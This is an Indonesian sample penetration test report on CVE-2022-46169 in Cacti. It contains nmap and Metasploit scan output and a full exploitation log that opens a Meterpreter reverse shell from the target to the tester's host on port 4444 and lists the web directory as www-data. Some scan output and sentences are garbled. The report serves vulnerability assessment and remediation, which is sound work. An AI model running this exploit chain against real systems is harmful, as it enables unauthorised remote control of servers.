



Sample Penetration Test Report Example Company

Company: Customer Name

Date: 01 July 2024

Version 1.0

Pendahuluan

Laporan ini disusun sebagai hasil pengujian penetrasi terhadap CVE-2022-46169, sebuah kerentanan yang ditemukan dalam perangkat lunak Cacti. Kerentanan ini memungkinkan serangan tanpa autentikasi untuk melakukan eksekusi perintah sistem secara sewenang-wenang pada server yang menjalankan Cacti. Dalam laporan ini, kami akan memberikan detail mengenai temuan kerentanan CVE-2022-46169 yang kami identifikasi selama penilaian. Kami akan menjelaskan dengan rinci potensi dampak dan risiko yang terkait dengan kerentanan ini, serta memberikan rekomendasi tindakan untuk memperbaiki kerentanan tersebut dan meningkatkan keamanan sistem secara menyeluruh.

Ruang Lingkup

Evaluasi keamanan sistem informasi pada Cacti dilakukan di lingkungan produksi dengan melakukan upaya peretasan berdasarkan kerentanan yang ditemukan. Host dan alamat IP yang diuji adalah sebagai berikut:

- Host: Sistem Utama, IP: 10.33.102.224

Host: Target, IP: 10.33.102.212
Host: Target, IP: 10.33.102.225
Host: Target, IP: 10.33.102.226

Metodologi

Metodologi yang digunakan dalam pengujian penetrasi ini terdiri dari beberapa tahap yang sistematis untuk memastikan pengujian yang menyeluruh dan efektif. Tahap-tahap ini meliputi information gathering, vulnerability scanning, vulnerability analysis, vulnerability exploitation, recommendation and reporting. Metodologi ini dirancang untuk mengidentifikasi dan mengatasi potensi celah keamanan dalam sistem secara menyeluruh.

Identifikasi Kerentanan

Pemindaian menggunakan Nmap pada alamat IP 10.33.102.212, 10.33.102.225, dan 10.33.102.226 dilakukan dengan perintah nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt. Perintah ini digunakan untuk memindai jaringan terhadap sejumlah alamat IP yang terdaftar dalam file targets.txt. Hasil pemindaian mencakup identifikasi versi perangkat lunak yang berjalan, eksekusi skrip otomatis untuk analisis keamanan, dan pengambilan judul halaman utama dari server web yang terdeteksi. Informasi hasil pemindaian akan disimpan dalam file nmap_results.txt untuk referensi dan analisis lebih lanjut.

Content-Type: text/plain; charset=utf-8

Nmap 7.80 scan initiated Mon Jul 1 19:49:03 2024 as: nmap -sV -sC -Pn -script http-title -iL targets.txt -oN nmap results.txt Nmap scan report for 10.33.102.225 Host is up (0.0013s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; 22/tcp open ssh protocol 2.0) 80/tcp open http Apache httpd 2.4.54 ((Debian)) http-server-header: Apache/2.4.54 (Debian) | http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux kernel Nmap scan report for 10.33.102.226 Host is up (0.0013s latency). Not shown: 996 closed ports PORT STATE SERVICE **VERSION** 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) http-server-header: Apache/2.4.52 (Ubuntu) | http-title: Login to Cacti 3000/tcp open ppp? | fingerprint-strings: | FourOhFourRequest: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 12:49:50 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 47 Connection: close Cannot GET /nice%20ports%2C/Tri%6Eity.txt%2ebak GetRequest: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 12:49:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 12 Connection: close Cannot GET / HTTPOptions, RTSPRequest: HTTP/1.1 404 Not Found Date: Mon, 01 Jul 2024 12:49:20 GMT

Content-Length: 16 Connection: close Cannot OPTIONS / Help: HTTP/1.1 400 Bad Request Date: Mon, 01 Jul 2024 12:49:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11 Connection: close Request Kerberos, TLSSessionReq: HTTP/1.1 400 Bad Request Date: Mon, 01 Jul 2024 12:49:40 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11 Connection: close Request LPDString: HTTP/1.1 400 Bad Request Date: Mon, 01 Jul 2024 12:49:50 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11 Connection: close Request SSLSessionReg: HTTP/1.1 400 Bad Request Date: Mon, 01 Jul 2024 12:49:35 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 11 Connection: close Request 8181/tcp open intermapper? | fingerprint-strings: FourOhFourRequest: HTTP/1.0 404 Not Found Content-Type: text/plain; charset=utf-8 Vary: Origin X-Content-Type-Options: nosniff Date: Mon, 01 Jul 2024 12:49:35 GMT

Content-Length: 19 page not found

GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq,



TLSSessionReq, TerminalServerCookie:

- HTTP/1.1 400 Bad Request
- Content-Type: text/plain; charset=utf-8
- Connection: close
- Request
- | GetRequest, HTTPOptions:
- HTTP/1.0 404 Not Found
- Content-Type: text/plain; charset=utf-8
- Vary: Origin
- X-Content-Type-Options: nosniff
- Date: Mon, 01 Jul 2024 12:49:10 GMT
- Content-Length: 19 page not found
- 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service:

=========NEXT SERVICE FINGERPRINT (SUBMIT

INDIVIDUALLY)=========

- $SF-Port3000-TCP: V=7.80\% I=7\% D=7/1\% Time=6682 A5 CB\% P=x86_64-pc-linux-gnu\% r (Get$
- $SF: Request, 9B, "HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon, x2001\x20$
- $SF: Jul\x202024\x2012:49:15\x20GMT\r\nContent-Type:\x20text/plain; \x20chars$
- $SF:et=utf-8\r\nContent-Length:\x2012\r\nConnection:\x20close\r\n\r\nCannot$
- $SF:\x20GET\x20/")\%r(Help,9C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Bad\x20Request\r\nDate:\x20Bad\x20Ba$
- $SF:20Mon, \x2001\x20Jul\x202024\x2012:49:15\x20GMT\r\nContent-Type: \x20text$
- $SF:/plain;\\x20charset=utf-8\\r\\nContent-Length:\\x2011\\r\\nConnection:\\x20clo SF:se\\r\\n\\r\\nBad\\x20Request")\\%r(HTTPOptions,9F,"HTTP/1\\.1\\x20404\\x20Not\\x2$
- $SF:0Found\\r\\nDate:\\x20Mon,\\x2001\\x20Ju\\x202024\\x2012:49:20\\x20GMT\\r\\nCont$
- $SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nContent-Length:\x2016\r\nCSF:onnection:\x20close\r\n\r\nCannot\x20OPTIONS\x20/")$

%r(RTSPRequest,9F,"H

- $SF:TTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x$
- $SF:2012:49:20\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC$

 $SF: ontent-Length: \x2016\r\nConnection: \x20close\r\n\r\nCannot \x20OPTIONS\x$

 $SF:20/")\%r(SSLSessionReq,9C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Bad\x20Request\r\nDate:\x20Bad\x20Ba$

 $SF:20Mon, \x2001\x20Jul\x202024\x2012:49:35\x20GMT\r\nContent-Type: \x20text$

 $SF:/plain;\\ x20charset=utf-8\\\\ nContent-Length:\\ x2011\\\\ nConnection:\\ x20clo SF:se\\\\ n\\\\ nBad\\\\ x20Request")\\\\ wr(TLSSessionReq,9C,"HTTP/1\\\\.1\\\\ x20400\\\\ x20Bad\\\\$

 $SF:x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:49:40\x20GMT\r\n$

 $SF: Content-Type: \x20 text/plain; \x20 charset = utf-8 \r\nContent-Length: \x2011 \$

SF:r\nConnection:\x20close\r\n\r\nBad\x20Request")

%r(Kerberos,9C,"HTTP/1\.

 $SF:1\x20400\x20Bad\x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:$

 $SF:49:40\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConten$

 $SF:t-Length: \x2011\r\nConnection: \x20close\r\n\r\nBad\x20Request") \\ %r(Four O$

 $SF:hFourRequest,BE,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x200$

 $SF:1\x20Jul\x202024\x2012:49:50\x20GMT\r\nContent-Type:\x20text/plain;\x20$

SF:annot\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2ebak") %r(LPDString,9C,

 $SF: "HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x2020$

 $SF:24\x2012:49:50\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\$

 $SF: r\nContent-Length: \x2011\r\nConnection: \x20close\r\n\r\nBad\x20Request"$

SF:);

=========NEXT SERVICE FINGERPRINT (SUBMIT

INDIVIDUALLY)=========

 $SF-Port8181-TCP: V=7.80\% I=7\% D=7/1\% Time=6682 A5C6\% P=x86_64-pc-linux-gnu\% r (Get$

 $SF: Request, BE, "HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type: \x20text/p$



 $SF: lain; \x20 charset = utf-8 r\nVary: \x20 Origin\r\nX-Content-Type-Options: \x20 SF: 0 nosniff\r\nDate: \x20 Mon, \x2001\x20 Jul\x202024\x2012: 49: 10\x20 GMT\r\nCo$

 $SF:ntent-Length: \x2019\r\n\r\n404\x20page\x20not\x20found\n") \xspace{2.20} % r(SSLSession$

 $SF: Req, 67, "HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla$

 $SF:in;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Reque$

 $SF:st")\%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T$

 $SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400 SF:\x20Bad\x20Request")\%r(HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found$

 $SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\SF:nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2001\x20Jul\x2020$

 $SF:24\x2012:49:10\x20GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20no$

 $SF:t\x20found\n")\%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n$

 $SF: Content-Type: \x20 text/plain; \x20 charset=utf-8\r\nConnection: \x20 close\r\ SF: \n\r\n400\x20 Bad\x20 Request") \%r(Help,67,"HTTP/1\.1\x20400\x20 Bad\x20 Request") \$

 $SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2SF:0close\r\n\r\n400\x20Bad\x20Request")$

%r(TerminalServerCookie,67,"HTTP/1

 $SF:= utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request") \\ \%r(TLSSess$

 $SF: ionReq, 67, "HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/$

 $SF:plain;\\ x20charset=utf-8\\r\\nConnection:\\ x20close\\r\\n\\r\\n400\\x20Bad\\x20Re$

 $SF: quest") \%r (Kerberos, 67, "HTTP/1 \. 1 \x 20400 \x 20Bad \x 20Request \r \ nContent-Ty$

 $SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\SF:x20Bad\x20Request") %r(FourOhFourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20$



 $SF:in\r\nZ-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2001\x20Jul\sF:x202024\x2012:49:35\x20GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\$

 $SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clos SF:e\r\n\x20Bad\x20Bequest");$

Service Info: OS: Linux; CPE: cpe:/o:linux:linux kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done at Mon Jul 1 19:50:42 2024 -- 2 IP addresses (2 hosts up) scanned in 98.54 seconds

Hasil pemindaian menunjukkan bahwa pada alamat IP 10.33.102.212:

- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.2p1 pada Ubuntu.
- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.54 pada Debian, judul halamannya adalah 'Login to Cacti'.
- Port 8086/tcp terbuka dengan layanan HTTP untuk InfluxDB versi 1.6.4 tanpa judul halaman.
- Sistem operasi yang terdeteksi adalah Linux.

Pada alamat IP 10.33.102.225:

- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.2p1 pada Ubuntu.
- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.54 pada Debian, judul halamannya adalah 'Login to Cacti'.
- Sistem operasi yang terdeteksi adalah Linux.

Pada alamat IP 10.33.102.226:

- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.9p1 pada Ubuntu.
- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.52 pada Ubuntu, judul halamannya adalah 'Login to Cacti'.
- Sistem operasi yang terdeteksi adalah Linux.

Informasi hasil pemindaian ini disimpan dalam file nmap_results.txt untuk referensi dan analisis lebih lanjut.



Vulnerability Scanning

Vulnerability scanning dilakukan menggunakan perangkat lunak Metasploit. Metasploit adalah open-source, platform pengujian penetrasi berbasis Ruby yang memungkinkan pengguna untuk menulis, menguji, dan mengeksekusi kode eksploit. Sistem pengujian penetrasi atau pengujian pena bekerja dengan mensimulasikan serangan cyber untuk memeriksa kerentanan yang rentan. Dibawah ini menampilkan hasil dari pemindaian kerentanan yang ditemukan oleh Metasploit.

======= Vulnerability Scan Result for 10.33.102.225

Running the 'init' command for the database:

Existing database found, attempting to start it

Starting database at

/home/yoan/snap/metasploit-framework/common/.msf4/db...waiting for

server to start.... stopped waiting

pg_ctl: could not start server

Examine the log output.

failed

This copy of metasploit-framework is more than two weeks old.

Consider running 'msfupdate' to update to the latest version.

[*] Using configured payload linux/x86/meterpreter/reverse_tcp

RHOSTS => 10.33.102.225

RPORT = > 80

[*] 10.33.102.225:80 - The target appears to be vulnerable. The target is Cacti version 1.2.22

======= Vulnerability Scan Result for 10.33.102.226

Running the 'init' command for the database:

Existing database found, attempting to start it

Starting database at

/home/yoan/snap/metasploit-framework/common/.msf4/db...waiting for

server to start.... stopped waiting

pg ctl: could not start server

Examine the log output.

failed

This copy of metasploit-framework is more than two weeks old.

Consider running 'msfupdate' to update to the latest version.



[*] Using configured payload linux/x86/meterpreter/reverse_tcp RHOSTS => 10.33.102.226 RPORT => 80 [*] 10.33.102.226:80 - The target is not exploitable. The target is Cacti version 1.2.27

Metasploit melakukan pemindaian kerentanan pada target sistem dan berhasil mengidentifikasi bahwa alamat IP 10.33.102.212 dan 10.33.102.225, pada port 80, menjalankan aplikasi Cacti versi 1.2.22 yang rentan, dengan celah keamanan yang dapat dieksploitasi. Sementara itu, target dengan alamat IP 10.33.102.226 menjalankan aplikasi Cacti versi 1.2.27 yang tidak rentan terhadap eksploitasi yang sama seperti versi sebelumnya, mungkin karena telah diperbarui atau diperbaiki untuk menutup kerentanan yang ada pada versi 1.2.22.

Vulnerability Exploitation

Pada bagian ini, dilakukan beberapa serangan untuk menguji kerentanan yang telah diidentifikasi sebelumnya. Serangan pertama adalah eksploitasi Command Injection aplikasi kerentanan pada Cacti menggunakan Metasploit. Langkah ini dilakukan untuk memanfaatkan celah keamanan yang ditemukan dalam versi 1.2.22 dari Cacti, dengan tujuan memperoleh dalam rentan.Metasploit akses ilegal ke sistem yang berhasil mengeksploitasi kerentanan yang ada pada aplikasi Cacti versi 1.2.22 yang dijalankan pada alamat IP 10.33.102.212 dan 10.33.102.225 dengan ini, menggunakan eksploitasi Metasploit port 80. Dalam proses linux/x86/meterpreter/reverse tcp menggunakan pavload untuk menciptakan koneksi TCP terbalik dari target ke alamat IP Metasploit (10.33.102.224) pada port 4444. Meskipun awalnya eksploitasi tidak menghasilkan sesi Meterpreter, setelah beberapa upaya tambahan termasuk bruteforce terhadap host id dan local data id, Metasploit berhasil memperoleh akses.

Hasilnya, sesi Meterpreter berhasil dibuka, memberikan penyerang kontrol penuh terhadap sistem target. Melalui sesi ini, penyerang menggunakan perintah ls -la untuk menjelajahi isi direktori dari perspektif pengguna www-data. Informasi yang diperoleh dari hasil eksekusi perintah tersebut memungkinkan penyerang untuk memahami struktur file serta hak akses yang terkait dengan aplikasi Cacti yang disusupi.

10.33.102.225

Running the 'init' command for the database:

Existing database found, attempting to start it

Starting database at

 $/home/yoan/snap/metasploit-framework/common/.msf4/db...waiting\ for\ server\ to\ start....\ stopped\ waiting$

failed

[*] Processing exploit_cacti_resource.rc for ERB directives.

resource (exploit_cacti_resource.rc)> use

exploit/linux/http/cacti unauthenticated cmd injection

[*] Using configured payload linux/x86/meterpreter/reverse_tcp

resource (exploit_cacti_resource.rc)> set RHOSTS 10.33.102.225

RHOSTS => 10.33.102.225

resource (exploit cacti resource.rc)> set RPORT 80

RPORT => 80

resource (exploit cacti resource.rc)> set LHOST 10.33.102.224

LHOST => 10.33.102.224

resource (exploit_cacti_resource.rc)> exploit -j

- [*] Exploit running as background job 0.
- [*] Exploit completed, but no session was created.

resource (exploit_cacti_resource.rc)> sleep 20

- [*] Started reverse TCP handler on 10.33.102.224:4444
- [*] Running automatic check ("set AutoCheck false" to disable)
- [+] The target appears to be vulnerable. The target is Cacti version 1.2.22
- [*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations
- [*] Enumerating local data id values for host id 1
- [+] Found exploitable local data id 15 for host id 1
- [*] Command Stager progress 100.00% done (1118/1118 bytes)
- [*] Sending stage (1017704 bytes) to 10.33.102.225
- [*] Meterpreter session 1 opened (10.33.102.224:4444 ->
- 10.33.102.225:42996) at 2024-07-01 19:53:56 +0700

resource (exploit cacti resource.rc)> sessions -i

Active sessions

==========

Id Na	me Type	Inform	ation	Connect	ion
1	meterpreter	x86/linux ww	w-data @	172.24.0.3	10.33.102.224:4444
-> 10.33.102.225:42996 (172.24.0.3)					

```
resource (exploit cacti resource.rc) > sessions -c 'ls -la' -i 1
[*] Running 'ls -la' on meterpreter session 1 (172.24.0.3)
total 2792
drwxrwxrwx 1 www-data www-data 4096 Jun 3 07:28.
drwxr-xr-x 1 root root
                         4096 Nov 15 2022 ..
-rw-rw-r-- 1 www-data www-data 577 Aug 14 2022 .mdl style.rb
                                60 Aug 14 2022 .mdlrc
-rw-rw-r-- 1 www-data www-data
-rw----- 1 www-data www-data 1024 Jun 3 07:28 .rnd
-rw-rw-r-- 1 www-data www-data 254887 Aug 14 2022 CHANGELOG
-rw-rw-r-- 1 www-data www-data 15171 Aug 14 2022 LICENSE
-rw-rw-r-- 1 www-data www-data 11318 Aug 14 2022 README.md
-rw-rw-r-- 1 www-data www-data 4341 Aug 14 2022 about.php
-rw-rw-r-- 1 www-data www-data 63112 Aug 14 2022
aggregate graphs.php
-rw-rw-r-- 1 www-data www-data 18586 Aug 14 2022 aggregate items.php
-rw-rw-r-- 1 www-data www-data 25705 Aug 14 2022
aggregate templates.php
-rw-rw-r-- 1 www-data www-data 14677 Aug 14 2022
auth changepassword.php
-rw-rw-r-- 1 www-data www-data 15221 Aug 14 2022 auth login.php
-rw-rw-r-- 1 www-data www-data 19044 Aug 14 2022 auth profile.php
-rw-rw-r-- 1 www-data www-data 24203 Aug 14 2022
automation devices.php
-rw-rw-r-- 1 www-data www-data 36742 Aug 14 2022
automation graph rules.php
-rw-rw-r-- 1 www-data www-data 42897 Aug 14 2022
automation networks.php
-rw-rw-r-- 1 www-data www-data 31517 Aug 14 2022 automation snmp.php
-rw-rw-r-- 1 www-data www-data 18773 Aug 14 2022
automation templates.php
-rw-rw-r-- 1 www-data www-data 38723 Aug 14 2022
automation tree rules.php
-rwxrwxr-x 1 www-data www-data 2959 Aug 14 2022 boost rrdupdate.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 cache
-rw-rw-r-- 1 www-data www-data 126187 Aug 14 2022 cacti.sgl
-rwxrwxr-x 1 www-data www-data 8077 Aug 14 2022 cactid.php
-rw-rw-r-- 1 www-data www-data 29268 Aug 14 2022 cdef.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 cli
-rw-rw-r-- 1 www-data www-data 1934 Aug 14 2022 clog.php
-rw-rw-r-- 1 www-data www-data 1940 Aug 14 2022 clog user.php
-rwxrwxr-x 1 www-data www-data 33597 Aug 14 2022 cmd.php
```

```
-rw-rw-r-- 1 www-data www-data 8843 Aug 14 2022 cmd realtime.php
-rw-rw-r-- 1 www-data www-data 24350 Aug 14 2022 color.php
-rw-rw-r-- 1 www-data www-data 24889 Aug 14 2022 color templates.php
-rw-rw-r-- 1 www-data www-data 13259 Aug 14 2022
color templates items.php
-rw-rw-r-- 1 www-data www-data 34558 Aug 14 2022 data debug.php
-rw-rw-r-- 1 www-data www-data 35500 Aug 14 2022 data input.php
-rw-rw-r-- 1 www-data www-data 49788 Aug 14 2022 data gueries.php
-rw-rw-r-- 1 www-data www-data 37433 Aug 14 2022
data source profiles.php
-rw-rw-r-- 1 www-data www-data 67358 Aug 14 2022 data sources.php
-rw-rw-r-- 1 www-data www-data 47694 Aug 14 2022 data templates.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 docs
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 formats
-rw-rw-r-- 1 www-data www-data 14319 Aug 14 2022 gprint presets.php
-rw-rw-r-- 1 www-data www-data 22061 Aug 14 2022 graph.php
-rw-rw-r-- 1 www-data www-data 5764 Aug 14 2022 graph image.php
-rw-rw-r-- 1 www-data www-data 9136 Aug 14 2022 graph json.php
-rw-rw-r-- 1 www-data www-data 17525 Aug 14 2022 graph realtime.php
-rw-rw-r-- 1 www-data www-data 41401 Aug 14 2022 graph templates.php
-rw-rw-r-- 1 www-data www-data 9586 Aug 14 2022
graph templates inputs.php
-rw-rw-r-- 1 www-data www-data 30755 Aug 14 2022
graph templates items.php
-rw-rw-r-- 1 www-data www-data 32392 Aug 14 2022 graph view.php
-rw-rw-r-- 1 www-data www-data 12466 Aug 14 2022 graph xport.php
-rw-rw-r-- 1 www-data www-data 88406 Aug 14 2022 graphs.php
-rw-rw-r-- 1 www-data www-data 26995 Aug 14 2022 graphs items.php
-rw-rw-r-- 1 www-data www-data 35613 Aug 14 2022 graphs new.php
-rw-rw-r-- 1 www-data www-data 3727 Aug 14 2022 help.php
-rw-rw-r-- 1 www-data www-data 67581 Aug 14 2022 host.php
-rw-rw-r-- 1 www-data www-data 30239 Aug 14 2022 host templates.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 images
drwxrwxr-x 1 www-data www-data 4096 Dec 12 2022 include
-rw-rw-r-- 1 www-data www-data 5721 Aug 14 2022 index.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 install
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 lib
-rw-rw-r-- 1 www-data www-data 3495 Aug 14 2022 link.php
-rw-rw-r-- 1 www-data www-data 21889 Aug 14 2022 links.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 locales
drwxrwxr-x 1 www-data www-data 4096 Jun 3 07:28 log
-rw-rw-r-- 1 www-data www-data 4666 Aug 14 2022 logout.php
```

```
-rw-rw-r-- 1 www-data www-data 38081 Aug 14 2022 managers.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 mibs
-rw-rw-r-- 1 www-data www-data 3410 Aug 14 2022
permission denied.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 plugins
-rw-rw-r-- 1 www-data www-data 28268 Aug 14 2022 plugins.php
-rwxrwxr-x 1 www-data www-data 35920 Aug 14 2022 poller.php
-rwxrwxr-x 1 www-data www-data 38581 Aug 14 2022
poller automation.php
-rwxrwxr-x 1 www-data www-data 35791 Aug 14 2022 poller boost.php
-rwxrwxr-x 1 www-data www-data 7095 Aug 14 2022
poller commands.php
-rwxrwxr-x 1 www-data www-data 11602 Aug 14 2022 poller dsstats.php
-rwxrwxr-x 1 www-data www-data 20170 Aug 14 2022
poller maintenance.php
-rwxrwxr-x 1 www-data www-data 9881 Aug 14 2022 poller_realtime.php
-rwxrwxr-x 1 www-data www-data 8830 Aug 14 2022 poller recovery.php
-rwxrwxr-x 1 www-data www-data 5722 Aug 14 2022 poller reports.php
-rwxrwxr-x 1 www-data www-data 8273 Aug 14 2022 poller spikekill.php
-rw-rw-r-- 1 www-data www-data 39278 Aug 14 2022 pollers.php
-rw-rw-r-- 1 www-data www-data 14552 Aug 14 2022 remote agent.php
-rw-rw-r-- 1 www-data www-data 5309 Aug 14 2022 reports admin.php
-rw-rw-r-- 1 www-data www-data 5210 Aug 14 2022 reports user.php
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 resource
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 rra
-rw-rw-r-- 1 www-data www-data 20183 Aug 14 2022 rrdcleaner.php
-rw-rw-r-- 1 www-data www-data 11907 Aug 14 2022 script server.php
drwxrwxr-x 1 www-data www-data 4096 Jun 3 07:28 scripts
drwxrwxr-x 1 www-data www-data 4096 Aug 14 2022 service
-rw-rw-r-- 1 www-data www-data 1728 Aug 14 2022 service check.php
-rw-rw-r-- 1 www-data www-data 43453 Aug 14 2022 settings.php
-rw-rw-r-- 1 www-data www-data 20567 Aug 14 2022 sites.php
-rw-rw-r-- 1 www-data www-data 2414 Aug 14 2022
snmpagent mibcache.php
-rw-rw-r-- 1 www-data www-data 3688 Aug 14 2022
snmpagent mibcachechild.php
-rwxrwxr-x 1 www-data www-data 5510 Aug 14 2022
snmpagent persist.php
-rw-rw-r-- 1 www-data www-data 3987 Aug 14 2022 spikekill.php
-rw-rw-r-- 1 www-data www-data 6597 Aug 14 2022 templates export.php
-rw-rw-r-- 1 www-data www-data 6263 Aug 14 2022 templates import.php
```

-rw-rw-r-- 1 www-data www-data 64922 Aug 14 2022 tree.php

```
-rw-rw-r-- 1 www-data www-data 29909 Aug 14 2022 user_admin.php
-rw-rw-r-- 1 www-data www-data 29909 Aug 14 2022 user_domains.php
-rw-rw-r-- 1 www-data www-data 89318 Aug 14 2022
user_group_admin.php
-rw-rw-r-- 1 www-data www-data 104198 Aug 14 2022 utilities.php
-rw-rw-r-- 1 www-data www-data 28883 Aug 14 2022 vdef.php
resource (exploit_cacti_resource.rc)> sleep 10
resource (exploit_cacti_resource.rc)> exit
[*] You have active sessions open, to exit anyway type "exit -y"
resource (exploit_cacti_resource.rc)> exit -y
```

Recommendation

Untuk mengurangi risiko dari CVE-2022-46169, disarankan untuk mengambil langkah-langkah berikut:

- Memperbarui Cacti ke versi terbaru yang tersedia.
- Menerapkan aturan firewall yang membatasi akses ke layanan Cacti.
- Melakukan evaluasi keamanan secara berkala dan pengujian penetrasi untuk mengidentifikasi dan mengatasi kerentanan.
- Menerapkan kebijakan sandi yang kuat dan menghindari penggunaan kredensial default.
- Rutin memperbarui perangkat untuk mengatasi masalah keamanan.